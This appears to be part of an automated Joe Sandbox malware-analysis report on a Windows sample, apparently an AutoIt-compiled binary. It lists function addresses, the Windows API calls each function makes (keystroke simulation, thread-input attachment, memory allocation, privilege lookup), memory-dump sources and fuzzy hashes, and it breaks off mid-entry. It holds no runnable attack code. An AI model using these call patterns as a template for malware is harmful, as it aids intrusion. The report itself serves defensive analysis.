API String ID: 82841172-0
Opcode ID: bb6c4f135b09ec6434a680283b67305a24fc78c96449972944d4893a89455d97
Instruction ID: 620c2779f92595114226d4217897d48f5e8d76df47bf80ecce66ce264f39168d
Opcode Fuzzy Hash: bb6c4f135b09ec6434a680283b67305a24fc78c96449972944d4893a89455d97
Instruction Fuzzy Hash: 6401F77600B1818FEF22D364D8E57E43F728D93228B1992CA9841C7967C4D7091ECBE5

Function 00D05D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00D05807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00D05D76

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 285090e344d7383490b03785872205c3a725edd8a515232bdc1830f1c52d5e8e
Instruction ID: 1cb29b7183b68e9e079c0cecd0e87f86917dfaa3cad9560cbe88de9b20e872c5
Opcode Fuzzy Hash: 285090e344d7383490b03785872205c3a725edd8a515232bdc1830f1c52d5e8e
Instruction Fuzzy Hash: 4C112531200B019FD320CF15E888B63B7E9EB45760F14892EE8AA86A94D7B1E945CF70

Function 00D74583 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00D745C0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 0c4e7cd8f3551746f25fd97fd0bce540f37fdb5a25732911a3b217c29de615ae
Instruction ID: 8d54a8c5d69cfb22d5fe60c05960b9e81bf62a3165517075732e90f5b7feea1a
Opcode Fuzzy Hash: 0c4e7cd8f3551746f25fd97fd0bce540f37fdb5a25732911a3b217c29de615ae
Instruction Fuzzy Hash: 27F04439614258AFCB15EBA4D846DAF7BBCEF59720B00405AF809DB251DE70B941CBB0

Function 00D24A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00D24AD6

Part of subcall function 00D28D68: __getptd_noexit.LIBCMT ref: 00D28D68

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 3210b60f3b26cda939594f71e18d6a674ab9599946d7c0801a05b0fd3dbf58f3
Instruction ID: f28540831020fa45d0b6aa332be11a39c5e502fe80743c1f924e17491e0fffb5
Opcode Fuzzy Hash: 3210b60f3b26cda939594f71e18d6a674ab9599946d7c0801a05b0fd3dbf58f3
Instruction Fuzzy Hash: C6F0A431941229DBDF51AF64EC0639F3661EF2032DF088518F8149B1D1CB788950DF75

Function 00D04FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00DC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D04FDE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 7d99c46862b82a7aa5917fafd562b224ea499eddc1d3ceb378402d81a0beaa8d
Instruction ID: 6aa2e9474eaca01a390fd53eeb196ce108a548532bf6ea512d06b27af17ddc73
Opcode Fuzzy Hash: 7d99c46862b82a7aa5917fafd562b224ea499eddc1d3ceb378402d81a0beaa8d
Instruction Fuzzy Hash: CAF039B1505712CFCB349F64E594D22BFE2BF143293248A3EE2DA82650CB32A840DF60

Function 00D209D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D209F4

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 20a6675dae1ae7eff51dbb17e6111b09ab58bfe32213e6a0ebf1a5bf0807ad8f
Instruction ID: e9fb8b693c50bfefdbbdf71b2e93a71aae543dcc4215215a6bebb1e86813b5f1
Opcode Fuzzy Hash: 20a6675dae1ae7eff51dbb17e6111b09ab58bfe32213e6a0ebf1a5bf0807ad8f
Instruction Fuzzy Hash: 41E0863690422857C720D6589C05FFAB7ADDF89690F0401B5FC0CD7244D960AC8186B0

Function 00D69129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00D6914B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 8251d5ff5db6f5e14733e04ec98f1c6adc282f664b6bb2506e38582314d9f464
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 7AE092B0104B005FD7348A24E810BE3B3E4EB16315F04081CF2AA83341EB62B8418B69

Function 00B408E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00B408EB

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: cf00a5f0f2ef4e70a213e56b3f38a0cc658daa084513fd32bf1909a318aae680
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: FEE08C71A2620CEBEB20EBBC8D08AA973E8DB44320F104694EA1AC3281D5348F40B654

Function 00D05DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00D3E16B,?,?,00000000), ref: 00D05DBF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e40539a35cf99a1c9715a8d6ee066b097ecc72f70fa85248568959abf20ac15a
Instruction ID: bd60e33dced5487092106a777e8acd94212388513a3914bacbc25d0549275087
Opcode Fuzzy Hash: e40539a35cf99a1c9715a8d6ee066b097ecc72f70fa85248568959abf20ac15a
Instruction Fuzzy Hash: 59D0C77465030CBFE710DB80DC46FA9777CD705710F200194FD0496390D6B27D508795

Function 00B408B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00B408BB

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: d18d345049c373193d7539b1a4eb4e33bea63215dac55014c9cbda2fe08c902b
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 2CD0A73091620CEBCB10DFB49D04ADA73E8DB04320F104794FE15D32C0D6319E40A7A0

Function 00D2548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00D25496

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: f4a5f623b3a90a35fba5b39aeb85d6b739e91d41da03fbb6f98be71fd51fcbc6
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: E1B0927684020C77DE012E82FC02E697B199B54678F808060FB0C18162A673A6A196A9

Function 00D6D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00D6D46A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 381be2c426578e991c3da0bedf1c99b381eab16e6e98d30f5592ce925695ba10
Instruction ID: 9d1e84b4ffd8d2a0b1e4f6bcb00c7b743204300d3b497d2f5796079fc39cdc92
Opcode Fuzzy Hash: 381be2c426578e991c3da0bedf1c99b381eab16e6e98d30f5592ce925695ba10
Instruction Fuzzy Hash: 80713F306043019FC714EF28E491B6AB7E1EF99314F08456DF89A9B2A2DB30ED45CB72

Function 00D20E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00D20EF7

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: eeda39f42e304746c3109c5931248b01c3cfd0c30af2bf812322b9b33cdef2ac
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 73311670A00115DFC718DF48E584969FBB6FF69304B298AA5E449CB652D731EDC1CBE0

Function 00B4227C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00B42291

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 12634195662698f8791b84a314d18c02a3cf193e9e102dc30262f19981075755
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 22E0BF7494010DEFDB00EFA4D5496DE7BB4EF04301F1005A1FD05D7680DB709E549A62

Function 00B42280 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00B42291

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 55452ab0405d1743e572cf669a1407cf3636cd642e82f215cba2ff92ffb15a16
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: AFE0E67494010DDFDB00EFB4D54969E7FF4EF04301F1001A1FD01D2280D6709E509A62

Non-executed Functions

Function 00D8CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00D8CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D8CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00D8CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D8CF00
SendMessageW.USER32 ref: 00D8CF29
_wcsncpy.LIBCMT ref: 00D8CFA1
GetKeyState.USER32(00000011), ref: 00D8CFC2
GetKeyState.USER32(00000009), ref: 00D8CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D8CFE5
GetKeyState.USER32(00000010), ref: 00D8CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D8D018
SendMessageW.USER32 ref: 00D8D03F
SendMessageW.USER32(?,00001030,?,00D8B602), ref: 00D8D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00D8D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00D8D16E
SetCapture.USER32(?), ref: 00D8D177
ClientToScreen.USER32(?,?), ref: 00D8D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00D8D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D8D203
ReleaseCapture.USER32 ref: 00D8D20E
GetCursorPos.USER32(?), ref: 00D8D248
ScreenToClient.USER32(?,?), ref: 00D8D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00D8D2B1
SendMessageW.USER32 ref: 00D8D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00D8D31C
SendMessageW.USER32 ref: 00D8D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D8D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00D8D37B
GetCursorPos.USER32(?), ref: 00D8D39B
ScreenToClient.USER32(?,?), ref: 00D8D3A8
GetParent.USER32(?), ref: 00D8D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00D8D431
SendMessageW.USER32 ref: 00D8D462
ClientToScreen.USER32(?,?), ref: 00D8D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D8D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00D8D51A
SendMessageW.USER32 ref: 00D8D53D
ClientToScreen.USER32(?,?), ref: 00D8D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00D8D5C3

Part of subcall function 00D025DB: GetWindowLongW.USER32(?,000000EB), ref: 00D025EC

GetWindowLongW.USER32(?,000000F0), ref: 00D8D65F

Strings

@GUI_DRAGID, xrefs: 00D8D1AA
F, xrefs: 00D8D543

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: f3c25fdc7130e276c5fd0c200d3fe5d33119a989d39e4ccd75e23c914941764c
Instruction ID: 2d586fb58bf26e887ef6232e349a0689938eb56744ccd6e29a27b002d5aa9788
Opcode Fuzzy Hash: f3c25fdc7130e276c5fd0c200d3fe5d33119a989d39e4ccd75e23c914941764c
Instruction Fuzzy Hash: 9F425970214741EFD725AF28C888FAABBE5EF49314F180A19F695972E1D731D850CBB2

Function 00D8804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00D8873F

Strings

%d/%02d/%02d, xrefs: 00D88478

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 7c6683bc924f5bd2d84ddd5289f19b41112eb82961e65a967e76dacaba1783ed
Instruction ID: 06f117eb8d968ff8b5838d4c7efa5ab640eb936972737c123d36f97ebcd8e911
Opcode Fuzzy Hash: 7c6683bc924f5bd2d84ddd5289f19b41112eb82961e65a967e76dacaba1783ed
Instruction Fuzzy Hash: 9312F271500354ABEB24AF28DC49FAE7BB8EF49710F644169F915EA2E1EF708941DB30

Function 00D1710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D175C2
_memset.LIBCMT ref: 00D176B1
_memmove.LIBCMT ref: 00D17C4B
_memmove.LIBCMT ref: 00D17E4F

Strings

Q\E, xrefs: 00D181C1
[:<:]], xrefs: 00D175F1
\b(?=\w), xrefs: 00D53C34
\b(?<=\w), xrefs: 00D53C41
[:>:]], xrefs: 00D1760A
DEFINE, xrefs: 00D525AF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 9bc5fb06c08d29ce6636bf52bb947529a3e47b00e22191cc3071a85bd07c716f
Instruction ID: 94797dc4c85f66efc0c5764fbd25e58f05a2cc9e7198b098ada95f9b879b92da
Opcode Fuzzy Hash: 9bc5fb06c08d29ce6636bf52bb947529a3e47b00e22191cc3071a85bd07c716f
Instruction Fuzzy Hash: A693B171A00215DBDF24CF58D881BEDB7B1FF48315F28816AED55AB290EB709E85CB60

Function 00D04A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00D04A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D3DA8E
IsIconic.USER32(?), ref: 00D3DA97
ShowWindow.USER32(?,00000009), ref: 00D3DAA4
SetForegroundWindow.USER32(?), ref: 00D3DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D3DAC4
GetCurrentThreadId.KERNEL32 ref: 00D3DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D3DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00D3DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00D3DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00D3DAF8
SetForegroundWindow.USER32(?), ref: 00D3DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D3DB10
keybd_event.USER32(00000012,00000000), ref: 00D3DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D3DB25
keybd_event.USER32(00000012,00000000), ref: 00D3DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D3DB33
keybd_event.USER32(00000012,00000000), ref: 00D3DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D3DB42
keybd_event.USER32(00000012,00000000), ref: 00D3DB47
SetForegroundWindow.USER32(?), ref: 00D3DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00D3DB71

Strings

Shell_TrayWnd, xrefs: 00D3DA89

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 63bf67cfe8fabfdb85328a02624952dad1d3f1d6a8b6aa569b01c487880e7b9d
Instruction ID: 52c6b553619ae72c0eb5eb7d4d18fb30d64819c60b86c44860481e690d5479e9
Opcode Fuzzy Hash: 63bf67cfe8fabfdb85328a02624952dad1d3f1d6a8b6aa569b01c487880e7b9d
Instruction Fuzzy Hash: FF315271A50318BBEB216F619C4AF7E7E6DEB44B50F154065FA04EA2D0D6B05910AFB0

Function 00D58858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00D58CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D58D0D
